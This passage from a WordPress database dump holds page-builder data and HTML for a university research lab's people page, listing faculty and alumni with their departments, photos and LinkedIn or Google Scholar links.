Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c190\",\"index\":1,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c199\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c201\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c199\",\"index\":2,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c199\",\"index\":1,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c204\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c205\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c204\",\"index\":2,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c204\",\"index\":1,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c159\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c158\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c211\",\"parentId\":\"182-c210\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c210\",\"parentId\":\"182-c209\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c209\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-13 09:20:33','2023-10-13 13:20:33','',562,'https://gsudice.dataconn.net/?p=1713',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1714,1,'2023-10-13 09:20:33','2023-10-13 13:20:33','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c64\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c64 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c65-outer\">\n            <div data-colibri-id=\"182-c65\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c65 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-986 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 